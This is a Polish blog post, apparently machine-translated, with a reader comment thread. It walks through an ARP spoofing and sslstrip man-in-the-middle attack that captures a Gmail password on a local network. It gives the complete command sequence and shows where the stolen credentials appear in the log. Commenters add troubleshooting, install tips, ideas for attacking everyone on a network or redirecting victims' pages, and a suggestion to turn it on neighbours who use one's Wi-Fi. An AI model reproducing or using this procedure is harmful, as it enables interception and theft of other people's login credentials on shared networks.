ArpSpoofing i SSlstrip w akcji.

Witajcie blogerzy.

Na dziś mam małą próbkę tego, jak niebezpieczne może być podłączenie się do dowolnej sieci bez zabezpieczeń, które tak wielu z nas lubi.

Na dzień dzisiejszy zamierzam użyć ArpSpoofing z Sslstrip, aby uzyskać hasło do Gmaila. Aby zapewnić lepszą kontrolę środowiska, utworzyłem konto o nazwie „testarp@gmail.com".

A ponieważ nie bardzo lubię preambuły, przejdźmy do rzeczy.

W żadnym momencie nie odpowiadam za to, co mogą zrobić z następującymi informacjami. Robię to wyłącznie w celach edukacyjnych

ŚRODOWISKO

Do tego testu mamy następujące dane:

1. Atakujący: To jest mój komputer stacjonarny lub stacjonarny z Debianem Wheezy. Z repozytoriów możesz zainstalować sslstrip y dsniff mieć harfowanie

2. Ofiara: Ofiarą jest tablet z Androidem, który chce widzieć swoją pocztę tylko przez przeglądarkę.

3. Medium: Środek jest mój Router Cisco DPC2425

ADRESY.

Adres atakującego: 172.26.0.2

Adres routera: 172.26.0.1

Adres ofiary: 172.26.0.8

ATAK:

Aby trochę lepiej zrozumieć, jak działa atak, możesz przejść do mojego starego POST

Pierwszą rzeczą, jaką zrobimy w przypadku tego ataku, jest aktywacja przekazywania, aby nasz komputer mógł przesłać informacje do ofiary bez jej zauważenia. (W przeciwnym razie byłby to atak typu „odmowa usług”)

W tym celu użyjemy:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Każde polecenie w oknie konsoli bezpośredniej.

Teraz, jeśli zrobimy tail -f desdelinux widzimy informacje na żywo i bezpośrednio

migawka 1

Więc jak otrzymamy to, czego chcemy?

Najpierw wprowadźmy naszą pocztę na tablecie. Logując się, widzimy, że na naszej konsoli pojawiają się tysiące rzeczy.

Teraz, gdy wszystko jest już gotowe, otwórzmy nasz plik „desdelinux”z nano

nano desdelinux

za pomocą Control + W wyszukujemy coś, co nazywa się SECURE POST.

I zobaczymy coś takiego.

migawka 2

Wśród tej ogromnej linii, której nie widać, znajduje się adres e-mail i hasło ofiary.

Biegniemy więc w prawo, aż w końcu widzimy światło na końcu tunelu.

migawka 3

Przy innej okazji zobaczymy, jak możemy się trochę zabezpieczyć przed tymi atakami.

pozdrowienia


Zostaw swój komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

*

*

  1. Odpowiedzialny za dane: Miguel Ángel Gatón
  2. Cel danych: kontrola spamu, zarządzanie komentarzami.
  3. Legitymacja: Twoja zgoda
  4. Przekazywanie danych: Dane nie będą przekazywane stronom trzecim, z wyjątkiem obowiązku prawnego.
  5. Przechowywanie danych: baza danych hostowana przez Occentus Networks (UE)
  6. Prawa: w dowolnym momencie możesz ograniczyć, odzyskać i usunąć swoje dane.

  1.   @JlcMux. powiedział

    Korzystam z okazji, aby powiedzieć, że kiedy post został opublikowany, polecenia były nieprawidłowe.

    W poleceniu iptables na końcu brakuje 8080, który jest w innym wierszu. A potem wszystkie polecenia arpspoof były w tej samej linii. Każde polecenie znajduje się w innym wierszu.

    Mam nadzieję, że redaktor to zauważy i może to naprawić.

    Pozdrowienia.

    1.    Manuel de la Fuente . , , , , , , , , , , , ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, , powiedział

      Dokonałem poprawek, o których wspominałeś, czy to w porządku?

      Jeśli zamierzasz wstawić kod w preferowanym wpisie, użyj widoku HTML i sprawdź, czy artykuł jest poprawny przed wysłaniem go do oczekujących. Dziękuję Ci.

  2.   Luis powiedział

    Przerażająca jest świadomość, że ci z nas, którzy nie mają wiedzy, są tak bezbronni. Bardzo dobra informacja, nawet jeśli niewiele rozumiem z tematu, zdaję sobie sprawę z wagi. Dziękuję Ci!
    pozdrowienia

  3.   giskard powiedział

    Ale to działa tylko wtedy, gdy atakujący i ofiara są w tej samej sieci. W każdym razie wydaje mi się, że jeśli (będąc w tej samej sieci) łączysz się za pomocą HTTPS, to się nie dzieje, ponieważ dane są szyfrowane PRZED opuszczeniem twojego komputera. Jeśli łączysz się przez HTTP (bez S) to myślę, że nawet patrząc na kabel sieciowy widzisz klucze.

    1.    @JlcMux. powiedział

      To nie prawda. Włamuję się do hasła do Gmaila i jeśli zauważysz, że Gmail używa https. Więc? Chodzi o to, że chociaż https jest bezpieczny, zależy od http. Więc to nie jest takie bezpieczne.

      Nie przyznawaj się tak dużo na temat https, że S nie jest dla Supermana, ale dla „bezpiecznego”

    2.    R Ten powiedział

      działa z https lub bez, próbowałem go z bardziej wyspecjalizowaną dystrybucją Linuksa i działa bez problemów

    3.    Manuel de la Fuente . , , , , , , , , , , , ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, ,, , powiedział

      Możesz go precyzyjnie wykorzystać, aby udzielić lekcji tym, którzy kradną Twoje Wi-Fi. 😀

      To mniej więcej tak, jak powiedzieli dawno temu na blogu Chema Alonso:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Rayonant powiedział

        Ostia, super, co robi! / A potem mówią mojemu paranoikowi za każdym razem, gdy korzystam z VPN, kiedy idą sprawdzić konto bankowe ...). Swoją drogą, musisz zobaczyć, jak cyniczni są ludzie w komentarzach ... jeśli w końcu to kradnie ...

        1.    Eliotime3000 powiedział

          Teraz musimy przejść samouczek dotyczący tworzenia i oferowania własnej usługi VPN.

      2.    Daniel powiedział

        Historia, którą łączysz, jest bardzo interesująca, wydaje się nawet warta powieści, a to przypomina mi, kiedy korzystałem z Internetu moich sąsiadów i chociaż mówię, że znam temat, myślę, że nigdy nie mogłem zobaczyć prawdziwych wymiarów niebezpieczeństwo, które mogłem mieć trwać, na szczęście dla mnie zmienili tylko hasło na WPA2 i tak zaczęła się moja historia z ISP haha

    4.    Mauritius powiedział

      Dlatego tytuł mówi o Sslstrip w akcji.

      Działa, o ile atakujący jest w środku

  4.   zaraz powiedział

    Na jakiej fali pracujesz na pryzmacie? -.-
    no.
    Na co czekasz, aby wysłać zapytanie XD
    pozdrowienia
    dobra wiadomość

  5.   auroszx powiedział

    Ciekawe, później zrobię test edukacyjny ... Może mógłbym nawet usunąć hasło do WiFi i trochę się pobawić 😛
    Czy możesz zrobić coś podobnego, aby wysłać różne strony do żądanych przez cel? Na przykład chcą otworzyć Facebooka, a ja przekierowuję ich do Google? 😛

    1.    @JlcMux. powiedział

      Tak. Ale to zupełnie inna rola.

      Może opublikuję to później.

  6.   ostatni nowicjusz powiedział

    bardzo dobry post, te tematy są bardzo edukacyjne, teraz musimy być w stanie przeciwdziałać temu atakowi, ponieważ niektórzy (jak ja) łączą się z sieciami publicznymi (na przykład uniwersytet), warto byłoby tego uniknąć.

    Pozdrowienia!

  7.   tylko-kolejny-dl-użytkownik powiedział

    U mnie to nie zadziałało 🙁

  8.   Wow powiedział

    Coś mi tu zawodzi, poza tym, że połączenia https są szyfrowane przez certyfikat serwera (gdy masz certyfikat na swoim komputerze, twoja przeglądarka jest odpowiedzialna za szyfrowanie), a iptables przekierowujesz port 80 (http) , a nie 443, czyli https

    1.    @JlcMux. powiedział

      Też tak myślałem. Chodzi o to, że chociaż https jest „bezpieczny”, niestety zależy od http. Więc sslstrip wykorzystuje to, sprawia, że ​​przeglądarka uważa, że ​​używa poświadczeń https, ale tak nie jest.

      1.    Wow powiedział

        cholera jasna! ale przeglądarka powinna zobaczyć ostrzeżenie typu "ten certyfikat pochodzi z podejrzanej strony lub coś w tym rodzaju" ... na pewno będę musiał zrobić testy XD

        1.    @JlcMux. powiedział

          Nie, absolutnie nic nie wychodzi.

  9.   tylko-kolejny-dl-użytkownik powiedział

    W końcu mi się udało
    Jestem podłączony do sieci WEP z hasłem, a mimo to hasło pokazało mi się bezpośrednio.

    Zapytanie. Czy możesz wykonać tę samą procedurę, ale dla wszystkich komputerów podłączonych do sieci, zamiast mieć jedną ofiarę?

    1.    @JlcMux. powiedział

      Tak, możesz. Ale nie robiłem eksperymentów. Wypróbuj sam i powiedz nam, jak sobie radzisz.

  10.   Sinnicka19 powiedział

    Jedyne, co mam z tym, to to, że maszyna ofiary przechodzi w tryb offline, ale sslstrip nic mi nie pokazuje: /

    1.    @JlcMux. powiedział

      Musisz na chwilę wyłączyć zaporę. Lub przynajmniej włącz połączenia przychodzące.

  11.   Pan Black powiedział

    Probe i mogłem zobaczyć tylko nazwę użytkownika i hasło do strony na Facebooku, w Gmailu nie znalazłem żadnego wyniku w dzienniku, potrzebowałem tylko wiersza arpspoof «arpspoof -i -t«. Z drugiej strony zaatakowana maszyna nie mogła otworzyć niektórych stron. Będę dalej badał, to jest bardzo interesujące. Pomoc dla tych, którzy używają Manjaro, pakiety do zainstalowania to: dsniff (tutaj jest arpspoff), twisted i python2-pyopenssl. Sslstrip można pobrać tutaj: http://www.thoughtcrime.org/software/sslstrip/
    Aby go uruchomić $ python2 sslstrip.py
    Pozdrowienia.

  12.   Pan Black powiedział

    Nie wyszedł, ale linia arpspoof to: #arpspoof -i int -t ip-ofiara ip-router

  13.   Gilbert powiedział

    spójrz, robię dokładnie to, co mówisz:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-porty 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    Problem w tym, że ofiara, czyli inny komputer, który mam tutaj w swoim pokoju, zostaje bez połączenia do tego stopnia, że ​​muszę zrestartować router, co mogę zrobić, pomóżcie.

    Inna rzecz, którą pracuję z maszyną wirtualną i kiedy wykonuję polecenie iwconfig, wlan0 nie pojawia się, ani kiedy wykonuję ifconfig, jednak jeśli mam internet na mojej maszynie wirtualnej, co z interfejsem eth0.